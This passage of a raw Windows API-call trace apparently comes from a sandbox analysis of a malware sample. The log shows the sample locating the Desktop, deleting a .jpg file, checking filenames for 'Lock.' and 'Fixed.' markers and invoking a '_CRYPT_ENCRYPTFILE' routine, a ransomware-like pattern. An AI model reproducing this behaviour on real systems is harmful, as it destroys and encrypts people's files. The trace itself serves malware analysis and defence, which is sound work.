[0136.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fed8 | out: hHeap=0x970000) returned 1 [0136.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0136.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0136.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538f0 | out: hHeap=0x970000) returned 1 [0136.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0136.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0136.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0136.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0136.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0136.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0136.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0136.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0136.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0136.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0136.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0136.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0136.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0136.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0136.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0136.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0136.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0136.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0136.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0136.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0136.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0136.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0136.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0136.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0136.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0136.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0136.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0136.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0136.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0136.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0136.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0136.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0136.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0136.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0136.684] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0136.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0136.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0136.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0136.684] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0136.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0136.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff10 [0136.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0136.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0136.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0136.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0136.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0136.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff10 | out: hHeap=0x970000) returned 1 [0136.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0136.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0136.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0136.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0136.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0136.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0136.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0136.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0136.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x54) returned 0x2e563a8 [0136.685] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/alm7UiDYbRcNr.jpg", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\alm7UiDYbRcNr.jpg", lpFilePart=0x8cedf4*="alm7UiDYbRcNr.jpg") returned 0x29 [0136.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0136.685] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\alm7UiDYbRcNr.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\alm7uidybrcnr.jpg")) returned 0x20 [0136.685] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\alm7UiDYbRcNr.jpg", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd80d70, ftCreationTime.dwHighDateTime=0x1d5ed23, ftLastAccessTime.dwLowDateTime=0xf9aa8940, ftLastAccessTime.dwHighDateTime=0x1d5ed4f, ftLastWriteTime.dwLowDateTime=0xf9aa8940, ftLastWriteTime.dwHighDateTime=0x1d5ed4f, nFileSizeHigh=0x0, nFileSizeLow=0x166f2, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="alm7UiDYbRcNr.jpg", cAlternateFileName="ALM7UI~1.JPG")) returned 0xa87510 [0136.685] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\alm7UiDYbRcNr.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\alm7uidybrcnr.jpg")) returned 1 [0136.779] FindNextFileW (in: hFindFile=0xa87510, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd80d70, ftCreationTime.dwHighDateTime=0x1d5ed23, ftLastAccessTime.dwLowDateTime=0xf9aa8940, ftLastAccessTime.dwHighDateTime=0x1d5ed4f, ftLastWriteTime.dwLowDateTime=0xf9aa8940, ftLastWriteTime.dwHighDateTime=0x1d5ed4f, nFileSizeHigh=0x0, nFileSizeLow=0x166f2, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="alm7UiDYbRcNr.jpg", cAlternateFileName="ALM7UI~1.JPG")) returned 0 [0136.779] FindClose (in: hFindFile=0xa87510 | out: hFindFile=0xa87510) returned 1 [0136.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0136.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0136.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0136.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0136.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0136.779] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0136.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0136.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0136.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0136.779] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0136.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0136.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0136.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0136.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0136.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0136.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0136.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0136.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0136.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538f0 | out: hHeap=0x970000) returned 1 [0136.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0136.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0136.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0136.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0136.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0136.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0136.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0136.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0136.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0136.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0136.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x54) returned 0x2e563a8 [0136.780] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/alm7UiDYbRcNr.jpg", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\alm7UiDYbRcNr.jpg", lpFilePart=0x8cf650*="alm7UiDYbRcNr.jpg") returned 0x29 [0136.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0136.780] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\alm7UiDYbRcNr.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\alm7uidybrcnr.jpg")) returned 0xffffffff [0136.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0136.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0136.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0136.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0136.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0136.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0136.781] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0136.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0136.781] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0136.781] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0136.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0136.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0136.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0136.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0136.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0136.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0136.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0136.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0136.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0136.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0136.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0136.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0136.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0136.781] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AuSKwF8iMWxqYFgPtC.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0136.781] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uSKwF8iMWxqYFgPtC.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0136.781] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SKwF8iMWxqYFgPtC.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0136.781] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KwF8iMWxqYFgPtC.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0136.781] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wF8iMWxqYFgPtC.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0136.781] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="F8iMWxqYFgPtC.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0136.781] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8iMWxqYFgPtC.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0136.781] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iMWxqYFgPtC.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0136.781] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MWxqYFgPtC.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0136.781] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WxqYFgPtC.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0136.824] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xqYFgPtC.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0136.824] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qYFgPtC.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0136.824] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YFgPtC.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0136.824] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FgPtC.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0136.824] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gPtC.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0136.824] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PtC.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0136.824] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tC.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0136.824] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0136.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0136.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0136.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0136.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0136.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0136.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0136.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0136.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0136.825] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0136.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0136.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0136.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0136.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0136.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0136.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0136.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0136.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0136.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0136.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0136.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0136.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0136.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0136.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0136.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0136.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0136.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0136.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0136.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2e) returned 0x2e7fe68 [0136.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0136.825] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AuSKwF8iMWxqYFgPtC.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0136.825] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uSKwF8iMWxqYFgPtC.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0136.825] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SKwF8iMWxqYFgPtC.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0136.825] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KwF8iMWxqYFgPtC.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0136.825] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wF8iMWxqYFgPtC.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0136.825] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="F8iMWxqYFgPtC.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0136.826] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8iMWxqYFgPtC.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0136.826] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iMWxqYFgPtC.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0136.826] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MWxqYFgPtC.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0136.826] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WxqYFgPtC.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0136.826] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xqYFgPtC.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0136.826] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qYFgPtC.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0136.826] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YFgPtC.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0136.826] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FgPtC.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0136.826] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gPtC.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0136.826] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PtC.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0136.826] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tC.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0136.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0136.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdf8 [0136.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0136.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdf8 | out: hHeap=0x970000) returned 1 [0136.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0136.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0136.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0136.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0136.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0136.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0136.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0136.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0136.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0136.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cc8 | out: hHeap=0x970000) returned 1 [0136.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0136.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0136.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0136.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0136.826] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0136.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fea0 [0136.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0136.827] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0136.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fea0 | out: hHeap=0x970000) returned 1 [0136.827] HeapFree (in: 